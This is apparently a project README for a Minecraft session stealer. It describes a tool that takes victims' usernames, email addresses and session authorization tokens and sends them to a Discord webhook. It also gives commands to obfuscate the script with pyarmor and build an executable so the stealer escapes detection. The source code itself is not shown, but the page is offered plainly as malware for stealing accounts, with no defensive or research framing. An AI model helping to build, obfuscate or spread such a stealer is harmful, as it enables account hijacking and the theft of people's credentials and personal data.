MinecraftSessionStealer
MinecraftSessionStealer copied to clipboard
A Minecraft session stealer involving authentication grabbing, with multiple OS support.
Minecraft Session Stealer - MSS
An easy way to grab session tokens from Minecraft and send to a Discord webhook.
Original Inspiration from wodxgod
Currently tested on Android, Kali Linux, Ubuntu, Windows 10 and Windows 7.
What does it grab?
- Usernames
- Email Address
- Session Type (Mojang or Microsoft)
- Session Authorization Token
Updates Soon
- [ ] UUID's
- [ ] Legacy Account
- [ ] Migrated Accounts
- [ ] Optifine Cape Status
- [ ] Local Identifier
- [ ] Avatar (For Microsoft Accounts)
Complile and Obfuscate
Open a terminal and enter in the commands below
pip3 install pyarmor
pyarmor obfuscate main.py
The outputed exe will be in /dist/
Example Output

Credits
- HellSec, WodxGod